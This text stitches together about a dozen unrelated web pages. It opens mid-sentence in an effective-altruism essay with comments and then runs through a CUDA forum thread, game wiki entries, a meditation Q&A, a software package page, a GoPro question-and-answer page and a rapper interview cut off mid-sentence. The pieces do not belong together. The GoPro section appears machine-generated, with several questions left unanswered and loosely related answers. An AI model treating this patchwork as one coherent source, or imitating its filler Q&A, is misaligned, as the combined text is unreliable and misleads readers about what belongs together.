99.9% of the population, but that still means there are about 7 million people in the world who have reflected as carefully as I have, and many of them disagree with me. The outside view says that I would probably change my mind about at least some of my values if I had more information, so I should be cautious about spreading them. There’s a sense of values spreading for which this reasoning does not apply. If I want to spread values, I might do that by presenting well-constructed arguments for why my values are important. Even if I’m wrong, I believe it is generally beneficial to produce new good arguments or expose more people to good arguments, presuming those people have sufficiently strong ability to evaluate arguments. Although I believe this sort of activity is probably beneficial in most cases, that’s a long way from the claim that it’s the best thing to be doing. 1 Which values to promote? I can think of a few values that are plausibly extremely important for people to hold: • Concern for non-human animals • Effective altruism • Utilitarianism • Rationality • Cooperation between people with competing goals • Desire for universal eudaimonia–filling the universe with beings experiencing the greatest possible happiness Right now a lot of EAs support spreading concern for non-human animals and effective altruism, and utilitarianism is pretty similar in practice to effective altruism (the reason a lot of people (including myself) got into EA is because it’s the logical conclusion of utilitarian ethics). CFAR and other similar organizations are trying to improve rationality. A lot of people care about spreading cooperation but I don’t know much about efforts to do this and whether any are effective. I don’t know of anyone specifically trying to spread desire for universal eudaimonia. Spreading desire for universal eudaimonia is plausibly the best of these, but as far as I know no one is doing this (and it’s not even clear how one would go about doing it). I generally believe that supporting effective object-level charities is more important than spreading effective altruism (this is a non-obvious claim but I don’t want to get into it here–the basic argument is that the best charities probably have much higher impact than the most popular EA charities). Spreading anti-speciesism may be highly valuable, but Brian’s mathematical intuition for the value of spreading desire for eudaimonia works against the case for anti-speciesism: a sufficiently large proportion of people care about animals that increasing this proportion is relatively difficult relative to increasing the proportion of people who share some less common value, like desire for universal eudaimonia. For the most part, these different values are not mutually contradictory, so in this sense the fact that it’s not obvious which values to spread does not act as an argument against spreading values. Value Shifts We have a few reasons to be optimistic that human values are moving in the right direction. Humans have become less violent and more cooperative over time (Steven Pinker has argued this in depth in The Better Angels of Our Nature; Holden discusses it here). In The Expanding Circle, Peter Singer argues that humans’ circles of compassion have expanded over time. In light of this evidence, it appears likely that concern for all sentient beings will eventually become widespread as most people’s circles of compassion expand. (Although some have disputed Singer’s evidence.) In the very long term, values shift due to evolutionary forces, and this could be harmful. But for now, values appear to be moving in a positive direction and will probably continue to do so. The evidence here is not very clear-cut and there’s some evidence in the opposite direction, but I’m generally optimistic. Debiasing people could lead to correct values In my experience, when people make non-utilitarian judgments in thought experiments, these judgments almost always arise due to well-understood cognitive biases. If these biases were corrected, they would make utilitarian judgments in most situations. A few examples of such situations come to mind. (I’m sure many readers will disagree with my assertion that people’s judgments are wrong in these scenarios. For such readers, you can probably think of an area where you disagree with most people, but you expect most people would agree with you if they had better information or were less biased.) It’s important to note that I do not expect standard rationality training to fix these errors in judgment. In most cases they would probably require much stronger interventions, such as creating technology to let people feel what it’s like to be a chicken or building an experience machine. I predict that technology like this will exist in the future. But I nonetheless find it likely that most people will change their minds about these scenarios once they get better information. • If we make humans capable of experiencing massively more happiness, then anyone who does it should agree that making it happen is super important. And if they don’t then I’m probably wrong about it being important. See Scott Alexander’s Wirehead Gods on Lotus Thrones. See also SMBC. • People find the repugnant conclusion repugnant because they are not mentally capable of aggregating small experiences over lots of people; see also Torture vs. Dust Specks and its followup Circular Altruism. • People don’t believe we should give all our resources to a utility monster because they can’t conceive of how amazingly happy a utility monster would be. • People are negative utilitarians because the worst possible suffering outweighs the best possible happiness in humans (and probably in all sentient animals), but this is likely untrue over the space of all possible minds. If we could modify humans to experience happiness equal to their capacity for suffering, they should choose, for example, 2 seconds of extreme happiness plus 1 second of extreme suffering rather than none of either. • Intelligent humans frequently discount animals because they believe they cannot suffer (which is factually false) or that higher-order reasoning or self-awareness is what makes suffering morally significant. If we can temporarily remove people’s self-awareness (which may be possible if we can upload humans to computers and then modify their minds), it should become obvious to them that self-awareness is not what makes suffering bad. And if it doesn’t become obvious then I’m probably wrong about that. • Many people believe that having twice as many happy people is less than twice as good. They probably believe this because their mental algorithms naively apply the principle of diminishing marginal utility even where it is not relevant, and their Systems 1 don’t know that diminishing marginal utility doesn’t work over people. • At EA Global, Joshua Greene gave a talk in which he claimed that drugs that enhance the amygdala response cause people to make more non-utilitarian judgments, and drugs that inhibit it make people more utilitarian. (Talk is available here.) Will value shifts carry through to the far future? Changing values now may not have much effect on values in the far future. Paul Christiano argues that changes to present-day values should be discounted by an order of magnitude when considering the far future: I think that convincing an additional 10% of the world to share my values would increase the value of the future by less than 1% via it’s [sic] effect on far future values[.] He presents a number of reasons to believe this; I have little to add to his analysis on this point. Societal values appear to be fairly malleable and moving in the right direction. Given sufficient time, it seems likely that we will produce highly good outcomes for not just humans but all sentient beings. We could speed up this process or make it more probable, but it feels much less urgent than extinction risk. Civilization has perhaps a 20% chance of collapsing in the next hundred years; it is critical that we prevent this from happening, and we need to act quickly. It’s conceivable that society could end up “locking in” its values at some point in the near future, perhaps by creating a singleton. In this case it would be urgent to ensure that the singleton has correct values. Probably the best way to do this would be to find plausible mechanisms by which this could happen and then ensure that the singleton has the correct values. For example, if AI researchers will create a superintelligent AI with locked in values that quickly takes control of everything, we have to make sure that the AI has good values. It’s critical to ensure that a superintelligent AI places appropriate value on non-human animals. However, it seems considerably more likely that we will go extinct than that we will get locked in to values that are bad but not bad in a way that kills all humans. Values Spreading as Cooperation Some people (such as Paul Christiano) frame values spreading as an uncooperative act in which I compete against other moral agents to push my values instead of theirs. But the values that I would actually want to spread don’t seem to fit this. I could of course attempt to spread cooperation itself. But other values I care about count as a sort of cooperation, as well. For example, spreading concern for animals really means getting more people to take actions that benefit animals’ interests. It’s not clear that we can coherently say that chickens value not being tortured on factory farms, but they certainly have an interest in not being tortured. However, chickens cannot be cooperated with in the sense that chickens do not try to spread their values, and perhaps the only sense in which it makes sense to talk about cooperation is with other agents that are trying to spread their own values. Problems with current efforts For the sake of brevity, I will only discuss spreading concern for animals in this section. I believe it is probably the most promising values-spreading intervention. We can relatively easily observe whether an advocacy organization successfully convinces people to eat less meat or fewer eggs (although even this is tricky). It’s intuitively plausible that when people eat less meat it’s because they care more about nonhuman animals, and they’re likely to propagate forward those values in ways that will benefit animals in the far future. But although this claim is plausible, there’s little actual evidence to support it–it has no advantage over claims about efforts to reduce existential risk. If the biggest benefit of animal advocacy organizations comes from spreading good values, then they need to put more effort into demonstrating that they actually do this. The evidence on this is extremely murky. As far as I know, Animal Ethics is the only organization that explicitly tries to spread concern for wild animal suffering, which is by far the biggest source of suffering that currently exists. They are a young organization and I have no idea if they’re succeeding at this goal. It’s not unfeasible to measure shifts in values for things we care about. But we have a difficult enough time figuring out whether animal charities even reduce meat consumption, much less change people’s fundamental judgments about non-human animals. The Open Philanthropy Project plans to put $5 million per year into reducing factory farming, but it looks like they plan to focus more on having a direct impact on factory-farmed animals rather than spreading concern for animals in general. Activities like this have to take into account the large effects that factory farming has on wild animals: reducing factory farming might actually be harmful for animals in the short run (although Brian Tomasik believes (with weak confidence) that it is more likely to be positive than negative), so it is critical that any efforts improve concern for animals in a way that will benefit animals in the far future. How efforts could be better Probably, some sorts of values spreading matter much, much more than others. Perhaps convincing AI researchers to care more about non-human animals could substantially increase the probability that a superintelligent AI will also care about animals. This could be highly impactful and may even be the most effective thing to do right now. (I am much more willing to consider donating to MIRI now that its executive director values non-human animals.) I don’t see anyone doing this, and if I did, I would want to see evidence that they were doing a good job; but this would plausibly be a highly effective intervention. There may be other sorts of targeted values spreading that work well. Veg outreach charities already try to target elite colleges on the premise that students there have more social leverage. You could probably do even better than that by targeting smaller and higher-leverage groups of people. Both existential risk reduction and long-term values spreading potentially have astronomical impact but have fairly weak evidence supporting their effectiveness. It’s not clear which values we should spread, and if we spread them it’s not clear if they will stick or that they will produce a better world than we should have had anyway. Additionally, existential risk reduction acts as a hedge: even if we don’t agree on values, lots of value systems agree that preventing extinction is good; and if civilization stays around for longer it gives us more time to find correct values. (It’s not obvious that values are the sort of thing you can deduce through reasoning, but I expect people’s values will often shift in the right direction in response to new knowledge, as explained in “Debiasing people could lead to correct values” above.) Policy debates should not appear one-sided; I do believe there are compelling advantages of values spreading over existential risk reduction. Perhaps it’s easier to push values in the right direction than it is to reduce the probability of an extinction event; perhaps the difference between the everyone’s-dead world and the business-as-usual world is smaller than the difference between business-as-usual and everyone-has-perfect-values. But in general I find the concerns with values spreading more significant and more clear, which leads me to the conclusion that supporting existential risk reduction is more important. 1. Actually, producing arguments on important subjects is probably the best thing to be doing in a lot of cases–it’s what I’m doing as I write this–but it has rapidly diminishing marginal utility. It’s probably valuable for me to spend five hours a week on this, but 40 would be excessive. For some people, like Brian Tomasik, who are exceptionally good at producing new and useful arguments, it may be better to do this full time. Producing arguments in this way sounds a lot like doing research. It’s beyond the scope of this essay to discuss whether high-impact research is the best cause to support. 13 comments, sorted by Highlighting new comments since Today at 11:08 AM New Comment Great post! I'm not sure what you mean by "wrong" here. :) Maybe you place a lot of value on the values that would be reached by a collective of smart, rational people thinking about the issues for a long time, and your current values are just best guesses of what this idealized group of people would arrive at? (assuming, unrealistically, that there would be a single unique output of that idealization process across a broad range of parameter settings) For people who hold very general values of caring what other smart, rational people would care about, values-spreading seems far less promising. In contrast, if -- in light of the utter arbitrariness of values -- you care more about whatever random values you happen to feel now based on your genetic and environmental background, values-spreading seems more appealing. And if we could modify humans to recognize just how amazing paperclips are, they should choose, for example, 2 paperclips plus 1 second of extreme suffering rather than none of either. I'm curious to know your probabilities of these outcomes. If the chance of extinction (including by uncontrolled AI) in the next century is 20%, and if human-level AI arrives in the next century, then the chance of human-controlled AI would be 80%. Within that 80%, I personally would put most of the probability mass on AIs that favor particular values or give most of the decision-making power to particular groups of people. (Indeed, this has been the trend throughout human history and up to the present. Even in democracies, wealthy people have far more power than ordinary citizens.) Addressing each of your comments in turn: 1. I'm fairly confident that hedonistic utilitarianism is true (for some sense of "true"). Much of my confidence comes from the observation that people's objections to utilitarianism play into well-known cognitive biases, and if these biases were removed, I'd expect more people to agree with me. If they didn't agree with me even if they didn't have these biases, that would be grounds for questioning my confidence in utilitarianism. 2. I think there's a difference between modifying people to be able to experience more happiness and modifying them to believe paperclips are great. The former modifies an experience and lets people's preferences arise naturally; the latter modifies preferences directly, so we can't trust that their preferences reflect what's actually good for them. Of course, preferences that arise naturally don't always reflect what's good for people either, but they do tend in that direction. I hadn't considered this as a particularly likely possibility. If you'll allow me to go up one meta level, this sort of argument is why I prefer to be more epistemically modest about far-future concerns, and why I wish more people would be more modest. This argument you've just made had not occurred to me during the many hours of thinking and discussion I've already conducted, and it seems plausible that a nontrivial portion of the probability mass of the far future falls on "a small group of people get control of everything and optimize the world for their own benefit." The existence of this argument, and the fact that I hadn't considered it before, makes me uncertain about my own ability to reason about the expected value of the far future. 1. One man's bias is another's intrinsic value, at least for "normative" biases like scope insensitivity, status-quo bias, and failure to aggregate. But at least I understand your meaning better. :) Most of LessWrong is not hedonistic utilitarian (most people there are more preference utilitarian or complexity-of-value consequentialist), so one might wonder why other people who think a lot about overcoming those normative biases aren't hedonistic utilitarians. 2. Of course, one could give people the experience of having grown up in a culture that valued paperclips, of meeting the Great Paperclip in the Sky and hearing him tell them that paperclips are the meaning of life, and so on. These might "naturally" incline people to intrinsically value paperclips. But I agree there seem to be some differences between this case and the pleasure case. 3. I'm glad that comment was useful. :) I think it's unfortunate that it's so often assumed that "human-controlled AI" means something like CEV, when in fact CEV seems to me a remote possibility. I don't know that you should downshift your ability to reason about the far future that much. :) Over time you'll hear more and more perspectives, which can help challenge previous assumptions. Simple: just because LessWrongers know that these biases exist doesn't mean they're immune to them. It was already pretty low, this is just an example of why I think it should be low. The question is what is the mechanism of value spreading. If the mechanism is having rational discussions then it is not necessarily urgent to have these discussions right now. Once we create a future in which there is no death and no economic pressures to self-modify in ways that are value destructive, we'll have plenty of time for rational discussions. Things like "experience machine" also fit into this framework, as long as the experiences are in some sense non-destructive (this rules out experiences that create addiction, for example). If the mechanism is anything but rational discussion then 1. It's not clear in what sense the values you're spreading are "correct" if it's impossible to convince other people through rational discussion. 2. I would definitely consider this sort of intervention as evil and would fight rather than cooperate with it (at least assuming the effect cannot be reversed by rational discussion; I also consider hedonistic utilitarianism abhorrent except as an approximate model in very restricted contexts). Regarding MIRI in particular, I don't think the result of their work depends on the personal opinions of its director in the way you suggest. I think that any reasonable solution to the FAI problem will be on the meta-level (defining what does it mean for values to be "correct") rather than the object level (hard-coding specific values like animal suffering). I mostly agree with you. I am less confident than you are that a solution to the FAI problem will be on the meta-level. I think you're probably right, but I have enough uncertainty about it that I much prefer someone who's doing AI safety research to share my values so I can be more confident that they will do research that's useful for all sentient beings and not just humans. Do you think that trying to supplant others' plans with your own is uncooperative? Coercing them for some greater good? We oughtn't define 'cooperative' as 'good', lest it lose all meaning. Paul could argue that cooperating with someone means helping them achieve their values. Cooperative approaches would be to help people to live out their values, and if you don't agree with their values, then you can trade your plans with theirs to get some Pareto-optimal outcome. That's probably a simple definition of cooperation in some economic fields... A more interesting edge case is trying to help them weigh together their meta-ethical views to arrive at ethical principles, which feels cooperative to me intuitively. The distinction here is a bit fuzzy. Some sorts of values spreading care clearly uncooperative, but other times it's unclear. Like what about trying to convince selfish people to be more cooperative? That's uncooperative in that it works against their goals, but if you're a "cooperation consequentialist" then you're still doing good because you're increasing the total amount of cooperation in the world. If you're a war criminal, and I slap you, it's still violence, irrespective of whether I call myself a "pacifism conseqentialist"! Yeah that's true. So it depends on whether you're talking about increasing the total amount of cooperation in the world, or increasing your personal level of cooperation with other agents. It seems to me that the former matters more than the latter. One point that I like to make is that for some philosophies, its more important to just help people to think clearly in general, rather than to promote one morality, because it's hard to justify moralising if you don't have strong objective reasons to think your metamoral reasoning is superior. If objectively bad thinking procedures led people to have a 'wrong' moral view, then correcting these could be easier than promoting a more dubious moral conclusion, while also helping selfish people. I'm curious under what circumstances we can judge thinking to be better or worse but can't make such judgments of "metamoral reasoning". I'm saying that on some views, you might want to make people do better things on their values, so long as those values are supported by good metamoral thinking. One way to do that is promote good clear thinking, or philosophical thinking in general, rather than just promoting your personal moral system. And for some reasons, perhaps signalling-related, it's much more common to see people profess and evangelise their personal moral beliefs than metaethical or general philosophical ones.
global_05_local_5_shard_00002591_processed.jsonl/39850
while () {;} statement eliminated by compiler I took me a while messing with PTX to find out why my program didn’t run correctly. It appears that the compiler just eliminates by optimization the following line completely: while (a==0) {;} the purpose of this line is that all threads wait until a condition is met. My only solution for now is to do this: volatile int dummy; while (a=0) {dummy++;} however that costs registers+performance. Is there a way to tell the compiler to not remove the statement. What could make [font=“Courier New”]a[/font] become zero? If it is set by some other thread in the same block, [font=“Courier New”]__syncthreads();[/font] should be sufficient on its own. If it is set by a different block, you are in dangerous territory. Is [font=“Courier New”]a[/font] declared volatile? If not, the compiler has just eliminated a potential endless loop. a is set by another block. I am running #blocks==#SMs actually a is a global variable, I’ll try a local volatile register for a. Registers can never be volatile, as the semantic of [font=“Courier New”]volatile[/font] is just to prevent keeping a variable in a register. A volatile global variable should do. Use [font=“Courier New”]__threadfence()[/font] in the thread that changes [font=“Courier New”]a[/font] to flush it out to global memory (or at least L2 cache).
global_05_local_5_shard_00002591_processed.jsonl/39861
Descriptive Writing Her thoughts tumbled like sneakers in a dryer. Despite her college degree, she had a limited vocabulary, like, whatever, Dude. She hurled epitaphs at him as he went out the door.  She threw up her hands while he shoved his in his pockets trying to get ahold of himself.  He grew on her like a germ culture in a petri dish. The boy and girl in the coffee shop were made for each other.  She had a laugh like a hyena approaching a carcass; his was a more refined bray. He spun into his break dance like a buffalo in a dust bath with ground hogs cheering. She fell for him fast and hard, like a bug hitting the windshield of a race car in the Indianapolis 500.  Seriously now.  I am thankful for and indebted to good editors.
global_05_local_5_shard_00002591_processed.jsonl/39901
Org Mode parser 0.1.3 is out! Beauty (OrgMode Parser 0.1.3) is here to stay! OrgMode parser is a small nodeJS library to parse Emacs OrgMode files (more info at this link). This version features: • Fixed empty header issue • Code Cleanup • Migration from jade to pug2 (new name of jade) • Added optional logging framework (winston) Also I’d like to thank all the people contributed: I have a list now.
global_05_local_5_shard_00002591_processed.jsonl/39920
an analytical report discussion help Can someone help me answer these questions using this reference: dragga.pdf 1. On page 156, in the first paragraph, Professor Lay writes well established ethos.  Why does she write this?  Explain what ethos is and why she wrote it for this particular sentence.  You might have to look up ethos in order to answer this question. 2. On page 156, on the last line of the page, Professor Lay writes consistent use of figures needed.  What does she mean by this comment?  How does she want the student to revise this sentence?  What is the rule for writing numbers in a document?  You might have to look it up if you are not sure of the answer. 3. On page 157, Professor Lay marks one sentence as a comma splice.  Why is it a comma splice?  Rewrite the sentence to correct this mistake. 4. Overall, this report was written on a “less technical” topic than the previous report (the one by Paul Anderson) was written on.  What makes this a document for a technical writing class?  Please write one or two sentences here for your answer.  If you would like to, you could refer to the Locker article that we read at the beginning of the semester. 5. On page 232, in the first paragraph, why does Professor Roberts question the use of passive voice in the opening memo of the report?  6. On page 232, in the second paragraph, why does Professor Roberts write unnecessary??  What is he thinking is unnecessary?  Why is he thinking it might be unnecessary? 7. On page 232, in the third paragraph, what is Professor Roberts questioning in his comment?  What specific phrase doesn’t he like? 8. On page 233, in the section titled Dependability, Professor Roberts writes Can you hear that this is jammed? What does he mean?  Please rewrite the sentence as if you were the student. 9. Please consider any other comment that Professor Roberts wrote on the paper.  What did you learn from the comment, or what observation can you make from the comment?  You can write a couple of sentences in answering this question. 10. Overall, what was the purpose of this analytical report? 
global_05_local_5_shard_00002591_processed.jsonl/39932
The official GemStone IV encyclopedia. Revision as of 10:54, 6 May 2019 by VANKRASN39 (talk | contribs) (weighting update, link update) Jump to: navigation, search This article is about blessing items to use against the undead. For the cleric ability related to Holy Receptacle (325), see BLESS (verb). For the lore skill, see Spiritual Lore, Blessings. Blessed weapons, shields, and armor are capable of harming the undead, who are otherwise immune to ordinary physical attacks. Common methods of blessing an item include: Armaments with an enchantment bonus require the casting cleric to have at least 40 ranks in the Cleric Base spell circle, or the Voln member to have rank at least half the enchantment bonus (for example, a rank 10 member can bless items of up to +20 bonus). Pure potions work regardless of enchantment. Items with inherent flares cannot be blessed. Certain materials with antimagic properties such as veil iron are also not usually blessable, though there are some rare exceptions. Weapons with weighting will receive a bless of shorter duration. Sanctified items Main article: Sanctified Sanctified weapons, shields, and armor are considered permanently blessed and able to harm the undead in the hands of a cleric or paladin. White ora and eonake are naturally sanctified. Clerics and paladins can use the ASSESS command to check an item for this property. Sanctified items will also be identified as holy items via loresinging. Sanctified items are not otherwise blessable when used by other professions. Paladins can also bond to any weapon using the Sanctify (1625) spell, which gives it the blessed property. Permablessed and undead bane items are considered blessed for anyone who wields them, and are extremely rare. Demons can only be harmed by blessed weapons with at least +40 enchantment bonus, or extraplanar bane. If the demon is phased, +20 blessed weapons will suffice. The enchantment threshold for archery is lower (confirmed with +30 bow and master-fletched blessed +25 arrows). See also
global_05_local_5_shard_00002591_processed.jsonl/39933
Spectral black warhorse The official GemStone IV encyclopedia. Revision as of 09:24, 2 March 2018 by DAID (talk | contribs) (Other information: not summoned in all terrains) Jump to: navigation, search [[Category: Miasmal Forest Black Moor creatures]] Spectral black warhorse Level 35 Family warhorse family creatures Body Type [[]] Area(s) Found [[Miasmal Forest Black Moor]] HP <Not Known> Speed {{{roundtime}}} Summoned by [[{{{master}}}]] Attack Attributes Physical Attacks Warding Attacks Offensive Spells & Abilities Defense Attributes You are not quite sure what to make of the black warhorse, as you have never seen anything that looks quite like it. Stopping a moment, you try to commit this creature to memory so that you can tell tales of it to your fellow adventurers back in the safety of the local tavern. Hunting strategies Other information Spectral black warhorses are summoned by lesser moor wights in areas they cannot summon lesser fetid corpses (muddy wetlands): A lesser moor wight raises one decaying arm in a series of mystical gestures, chanting an almost inaudible stream of prayers. A cold mist seeps up out of the ground, slowly dissipating to reveal a spectral black warhorse.
global_05_local_5_shard_00002591_processed.jsonl/39939
What Significance Stones Play While We Practice Meditation? 1592 views | 31 Jan 2010 Q: I place an aqua aura stone on my third eye, a rose quartz on my heart chakra, a hematite on my base chakra, and a stone that I can't recall its name on my sacral chakra while I meditate. Last evening, while meditating, I experienced myself being pulled inward very quickly and saw a kaleidoscope-like design in my third eye (it was green in colour). I recall feeling very frightened when this began to happen and telling myself that I was safe and to allow it to continue. I can't recall what I experienced next but I can recall being in that place for quite some time. Can you help explain what had happened to me? Thank you so much. Gurumaa: Truth is this Linda, the stones don't have powers. Stone is just a piece & your mind is more alive then a piece of a stone. But I don't know what kind of theory or what kind of philosophy you are practicing. May be it is good for you, but in my opinion, what ever you experience was not because of the stones which you have kept on your heart & eye & base chakra. This is nothing to do with that. Some times accidentally or coincidently people do gain good experiences because good, bad, evil everything is right there in your mind. The devil & the God are present in your mind. The positivities are godliness & anger, lust, greed, ego are the negative energies which in the Christian ideology is called the devil. So both are there & some times when mind is quiet and calm some good experiences may happen. But these experiences are just happening at the level of the mind. It can't be called meditation. show more
global_05_local_5_shard_00002591_processed.jsonl/39940
random-fu: Random number generation [ math, public-domain ] [ Propose Tags ] Versions [faq],,,, 0.0.3,,, 0.1.3, 0.1.4, 0.2,,,,,,,,,,,,,,, (info) Change log changelog.md Dependencies base (>=4 && <4.2 || >=4.9 && <5), erf, math-functions, monad-loops (>=, mtl (>=1 && <3), random (>=1.2.0), random-shuffle, random-source (==0.3.*), rvar (==0.2.*), syb, template-haskell, transformers, vector (>=0.7) [details] License LicenseRef-PublicDomain Author James Cook <[email protected]> Maintainer Dominic Steinitz <[email protected]> Category Math Home page https://github.com/mokus0/random-fu Source repo head: git clone https://github.com/mokus0/random-fu.git(random-fu) Uploaded by DominicSteinitz at 2020-07-02T09:09:15Z Downloads 21754 total (97 in the last 30 days) Rating (no votes yet) [estimated by Bayesian average] Your Rating • λ • λ • λ Status Hackage Matrix CI Docs uploaded by user Build status unknown [no reports yet] [Index] [Quick Jump] base-4.2 has an incompatible change in Data.Fixed (HasResolution) Maintainer's Corner For package maintainers and hackage trustees
global_05_local_5_shard_00002591_processed.jsonl/39959
Deactivating a group will not permanently remove a group from the system. If you do deactivate a group, you can always bring it back by activating it again. Follow these steps to deactivate a group. 1. Click on the Admin key 2. Click on Groups 3. Select the group(s) that you want to delete by ticking their checkbox 4. Click on the three vertical dots menu and select Deactivate A screenshot of the groups page highlighting the Deactivate button Please contact with any questions. Did this answer your question?
global_05_local_5_shard_00002591_processed.jsonl/39968
Quick Answer: Which GoPro To Buy For Beginners? Is GoPro worth buying? So, is getting a GoPro worth it. The answer isn’t as clear-cut if you already own a GoPro.. Is GoPro better than iPhone? The iPhone still generates great still shots, but the GoPro has a more advanced camera. It’s ultimately dependent on whether you want to bring a camera with you, but quality-wise, and based on where you can take it, the GoPro would result in a better camera. Why is GoPro so expensive? Which GoPro is the best for the money? Best GoPro cameras 2019GoPro Hero 8 Black: The action camera king. Price: $399 | Buy now from Amazon. … GoPro Max: The best 360 action camera. Price: $499 | Buy now from Amazon. … GoPro Hero 7 Black: The best mid-priced GoPro. … GoPro Hero 7 Silver: Solid specifications, reasonable price. … GoPro Hero (2018): The best budget option. Are all GoPros waterproof? How long can a GoPro record continuously? two hoursAlthough, considering the battery life, a HERO Session camera can only record continuously for up to two hours (1080p, 30 fps). This means that if you have a larger capacity SD card, and you connect the camera directly to a power source, you should be able to continue recording until full SD card capacity. Is GoPro good for photography? GoPros are best known for video, but they can also be used to shoot still photos. All GoPros can take pictures as JPGs; some can shoot RAW as well. And many models have several different picture modes, such as burst mode and time lapse photo mode. Is GoPro 7 or 8 better? Both GoPro 7 and GoPro 8 has 12 MP camera, the difference in GoPro 8 is that it has SuperPhoto with improved HDR. … With GoPro 8 you can create on-screen shortcuts based on the features you use most. There is one new model available in GoPro 8 which Night Lapse Video, the same is not available in GoPro 7. How long does GoPro battery last? 2 hoursFrom 1.5 – 2 hours with the following settings: Continual video shooting in 1080p at 60fps (the most popular video setting) No other features turned on. Does a GoPro record sound? Sound Quality The GoPro HD Hero records sound with a built‑in mono microphone, using 128kbps AAC compression at 48kHz sample rate. The protective case is extremely effective at reducing wind noise, and the sound recording itself remains impressive even when the unit is put through some pretty rough treatment! Which camera is best for photography? Which GoPro should I buy 2020? Is it worth to buy GoPro hero 8? Which is better GoPro 8 or Max? The Max can also shoot 270-degree panorama photos and, thanks to its wider lens, it can provide even better stabilisation than the Hero 8 Black. GoPro calls the Max the “world’s most stabilized Hero”, thanks to its Max HyperSmooth mode, which can keeps the horizon completely level for a smoother look. Which is the cheapest GoPro? The best GoPro prices right now1: GoPro Hero 9 Black deals. A brand new GoPro with software and hardware upgrades. … 2: GoPro Hero 8 deals. … 3: GoPro Max prices. … 4: GoPro Hero 7 Black prices. … 5: GoPro Hero 7 Silver prices. … 6: GoPro Hero 7 White prices. … 7: GoPro Hero 6 Black prices. … 8: GoPro Hero 5 Black prices.More items…• Can you overcharge GoPro? Re: GoPro hero 5 black battery seems to overcharge or discharge. From a completely depleted battery, it can take about 2 hours using a USB wall charger or about 4 hours if a computer USB port is used. When charging is complete, it’s important to ensure that you disconnect the camera from the charging source. What is the best GoPro for a beginner? The best GoPro you can buy right nowGoPro HERO 9 Black. The top-specced and best GoPro available. … GoPro HERO 8 Black. Arguably the best value GoPro available. … GoPro HERO 7 Black. An incredible action camera that can do pretty much everything the HERO8 can. … GoPro HERO 7 Silver. … GoPro HERO 7 White. … GoPro Max. Can I leave my GoPro charging all night? The answer is simple – Gopro Batteries generally take a couple hours to fully charge, when the do – The GoPro camera will turn off the red light. However its not considered a good idea to keep a lithium battery plugged in all night because this will reduce the charging cycles. Can I use my iPhone like a GoPro? If you want an action cam but don’t want to pay the big bucks, the ProShot might be just what you’re looking for. It’s a waterproof and ruggedized smartphone case designed to turn your iPhone into an action cam of sorts. Are Gopros good for YouTube? GoPro Hero 8 Black While the Go Pro Hero 9 just hit the market, the Hero 8 is still a fantastic option for vloggers. From its small waterproof design to its incredible image stabilization to its excellent video quality, the Hero 8 Black is one of the most versatile cameras you can get for creating YouTube vlog gold. How long does a GoPro 8 battery last? around 50 minutesThat said, the battery lasts around 50 minutes when continuously shooting in 2.7 or 4K at high frame rates, but you can stretch that out to more like 2 hours for lower resolution footage or TimeWarp videos.
global_05_local_5_shard_00002591_processed.jsonl/39984
The old saying goes "It ain't where you're from, it's where you're at" (shout-out to Rakim), but for Armani Caesar, it's both. The first lady of Griselda Records got her start rapping when she was 12 years old. Thanks to a chance meeting at a local studio in her hometown of Buffalo, N.Y. in 2007, she was rhyming alongside Benny The Butcher and Conway The Machine as part of the early-2000s rap collective Buff City. Those relationships are exactly why Westside Gunn signed her to Griselda Records this past March. He already knew she could rhyme, wrote her own verses and could bounce between the sounds of grimy New York rap and bass-heavy Southern hip-hop. Now with her new album, The Liz, released in September, she's basking in its positive reception, along with success of her clothing boutique Armani's Closet. All Armani wants to do is keep working; this story was a long time in the making. During her time as an active member of Buff City, Armani moved to North Carolina to go to school in 2008, opting to be a student and put more time into that than rapping. Her passion for hip-hop came right back to life when she began writing rhymes in her dorm room. She also enrolled in 9th Wonder's Hip Hop in Context class, a course he taught at North Carolina State alongside Kid from Kid N Play. She felt inspired to dig into the classics and important artists of early hip-hop, taking rap even more seriously. During this time, she kept releasing material, like the 17-track project Caesar's Palace in 2015. After that, Armani spent some time working as a stripper, but the hustle to get her music heard didn't stop. While radio was one way to get heard, the rising rapper knew she had more music to promote but didn't have the budget to do so. Before those radio spins, Armani decided to go hard on the video-sharing platform Triller in 2015. Clips of her songs "Get Trippy Freestyle" and the Ma$e-produced "Can't Take Him Back" began to blow up on Twitter and Instagram two years later as a result of her consistency on Triller. She even got "Can't Take Him Back" played on local radio in 2018. Her buzz picked up from there,  which got her back onto the radar of Westside Gunn. From there, the rest is history. Catch up on Armani's journey in this week's edition of The Break. Age: "I'm grown." Hometown: Buffalo, N.Y. I grew up listening to: "Everybody. From Dipset, Lil Wayne, [Lil'] Kim, Foxy [Brown], Biggie, Jay-Z, a little bit of everybody. I just love music. Missy [Elliott], Lauryn Hill, the Spice Girls, Gwen Stefani. I didn't really have a favorite, I just listened to so much music. I had playlists and moods. This was around the time Limewire was heavy, so once I got a hold of that, it was over. Putting viruses on my mama computer." My style’s been compared to: "Nobody current. Even people who say that I sound like a Foxy, they'll say that, but then they'll be like, 'But it's still you. I can hear you through it." It's more so like that feeling, like a breath of fresh air. People are missing that sound, and it was a  void in there for a long time because the South kinda took over. And you can even hear it in the female rap. It's like a lot of it has more Southern sound to it." I’m going to blow up because: "I just never gave up. I didn't think it was gonna work out, but it was something in me. I just couldn't stop doing it—even if I wanted to. I would be feeling a way, and then I would go write, and I would go to the studio, and record something, and be like, Yo, this shit is hard. Or even with my deal, I had got my first deal like years ago, like 2016. When you coming up, getting a deal, Oh, I made it! And ain't shit happen. Just prayer, faith, because any time that I got the answers right, it was because I guessed nine times out of 10." What’s your most slept-on song, and why?: "I got a project called Pretty Girls Get Played Too that I had dropped well before I got signed. That I think is fire that people haven't heard. '1990 Caesar,' another one that's fire that a lot of people didn't hear yet. I might redo those songs on different beats so that I can actually distribute them publicly, because they all kinda mixtape-ish." My standout records to date have been: "'Simply Done' with me, Benny [The Butcher] and DJ Premier. The 'Lil Cease' record I did, on Westside's FlyGod Is An Awesome God 2 [album]. That was huge ’cause everybody....I've never seen so many people recite that verse, which is why I'm so tight. I can't wait for the world to get back at least semi-normal because I'm ready to start doing shows. It's so many people, they'll comment under my pictures [on social media] with my verse, just all of the reposts I be seeing, and really and truly, more than half of them be men. That's so fire to me." My standout moments to date have been: "Getting a write-up in the Buffalo newspaper [The Buffalo News] on the first page. That was fire because that's home, and a lot of times, it takes you leaving home, and coming back to really get your flowers and acknowledgement. So, to see everything come full circle, that was fire. I wish they would've used a different picture though. My grandmother was probably looking like, 'What the hell! You got a bra on the newspaper!' "And this year as a whole, everything kinda been back to back so much, I really haven't had a chance to smell the roses just because I'm on to the next thing." Most people 